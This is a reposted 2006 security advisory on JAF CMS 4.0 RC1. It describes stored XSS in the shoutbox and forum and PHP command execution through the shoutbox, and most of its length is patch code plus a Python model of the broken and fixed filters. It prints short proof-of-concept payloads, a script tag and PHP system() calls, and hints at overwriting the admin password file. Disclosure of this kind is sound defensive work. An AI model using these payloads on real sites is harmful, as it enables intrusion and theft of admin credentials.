JAF CMS 4.0 RC1 multiple vulnerabilities

2006.10.03
Credit: NanoyMaster
Risk: High
Local: No
Remote: Yes
CWE: N/A

Hacker:  NanoyMaster
Exploit: JAF CMS
Version: 4.0 RC1

Vulnerabilities: XSS in shoutbox
                 PHP execution
                 XSS in forum

Props: z3r0phr34k, System_Meltdown, THK-GEO & THK-h3x, all of Exploitarians

//------------------------------------------------------------------------------//
// XSS in shoutbox //
//------------------------------------------------------------------------------//

Self explanatory... in the message body put:

    <script>alert('hi')</script>

Error: module/shout/jafshout.php
Line: 168 - 202

Lines 187 - 191 read:

    {
        // Every statement re-reads the raw $_POST['message'], so each
        // assignment overwrites the previous one and only the final
        // str_replace ("//" -> "edited") ever reaches the stored $message.
        $message = preg_replace('/"/','',$_POST['message']);
        $message = preg_replace("/>/","&gt;",$_POST['message']);
        $message = preg_replace("/</","&lt;",$_POST['message']);
        $message = str_replace("onmouse","",$_POST['message']);
        $message = str_replace("//","edited",$_POST['message']);
    }

Change the relevant lines to look like the following, bar the first $_POST['message']:

    {
        // The first step reads the POST field; every later step reads the
        // running $message, so all of the replacements apply in sequence.
        $message = preg_replace('/"/','',$_POST['message']);
        $message = preg_replace("/>/","&gt;",$message);
        $message = preg_replace("/</","&lt;",$message);
        $message = str_replace("onmouse","",$message);
        $message = str_replace("//","edited",$message);
    }

etc etc.

*note* This should be implemented on all of the variables stored to the flat-file module/files/shout *end note*

//------------------------------------------------------------------------------//
// PHP execution //
//------------------------------------------------------------------------------//

Yet again in the shoutbox, type something like:

    Windoze) <?php system(dir); ?>
    Linux)   <?php system(ls -la); ?>

You can see how useful this could be ;) possibly overwrite admin/data_inc.php (where the admin's password hash is) :p

Error: module/shout/jafshout.php
Line: 168 - 202
Patch: (see above code)

//------------------------------------------------------------------------------//
// XSS in forum //
//------------------------------------------------------------------------------//

Self explanatory... in the message body put:

    <script>alert('hi')</script>

Error: module/forum/topicwin.php
Line: 112 - 123

Lines 112 - 117 read:

    {
        // Submitted fields are stored verbatim and later rendered as HTML.
        $n_topic["name"]=$name;
        $n_topic["email"]=$email;
        $n_topic["title"]=$title;
        $n_topic["date"]=$date;
        $n_topic["ldate"]=$date;
        $n_topic["lname"]=$name;
    }

Change the relevant lines to look like the following:

    {
        // Encode every stored field; ENT_QUOTES converts both quote styles too.
        $n_topic["name"]=htmlentities($name, ENT_QUOTES);
        $n_topic["email"]=htmlentities($email, ENT_QUOTES);
        $n_topic["title"]=htmlentities($title, ENT_QUOTES);
        $n_topic["date"]=htmlentities($date, ENT_QUOTES);
        $n_topic["ldate"]=htmlentities($date, ENT_QUOTES);
        $n_topic["lname"]=htmlentities($name, ENT_QUOTES);
    }

etc etc.

//------------------------------------------------------------------------------//
// End //
//------------------------------------------------------------------------------//
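To make the shoutbox defect concrete, the following is an added example (not the advisory's or JAF CMS's code) that models the two jafshout.php filter chains in Python with the equivalent replacements, run over constructed messages; the forum-side fix is modelled with html.escape as the analogue of htmlentities(..., ENT_QUOTES). The chained filter also neutralises a stored "<?php" open tag, which is why the advisory points at the same patch for the PHP execution issue.

```python
import html
import re

# Constructed sample messages (not taken from the advisory), chosen so that
# each of the five filter steps in jafshout.php has something to act on.
SAMPLES = [
    "<script>alert('hi')</script>",
    'say "hi" // <b>bold</b> onmouseover',
]


def shout_filter_broken(raw: str) -> str:
    """Models the original lines 187-191: every step re-reads the POST field,
    so each assignment overwrites the previous one and only the last survives."""
    message = re.sub(r'"', '', raw)
    message = re.sub(r'>', '&gt;', raw)
    message = re.sub(r'<', '&lt;', raw)
    message = raw.replace('onmouse', '')
    message = raw.replace('//', 'edited')
    return message


def shout_filter_chained(raw: str) -> str:
    """Models the patched lines: the first step reads the POST field and every
    later step reads the running message, so all five replacements apply."""
    message = re.sub(r'"', '', raw)
    message = re.sub(r'>', '&gt;', message)
    message = re.sub(r'<', '&lt;', message)
    message = message.replace('onmouse', '')
    message = message.replace('//', 'edited')
    return message


def forum_escape(field: str) -> str:
    """Analogue of htmlentities($field, ENT_QUOTES) from the topicwin.php fix.
    Python encodes the apostrophe as &#x27; where PHP emits &#039;."""
    return html.escape(field, quote=True)


def contains_markup(stored: str) -> bool:
    """Stored values are rendered into HTML later, so a surviving tag is a risk."""
    return '<' in stored or '>' in stored


if __name__ == "__main__":
    for raw in SAMPLES:
        print("raw:    ", raw)
        print("broken: ", shout_filter_broken(raw),
              "| markup survives:", contains_markup(shout_filter_broken(raw)))
        print("chained:", shout_filter_chained(raw))
        print("forum:  ", forum_escape(raw))
```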


Copyright 2024, cxsecurity.com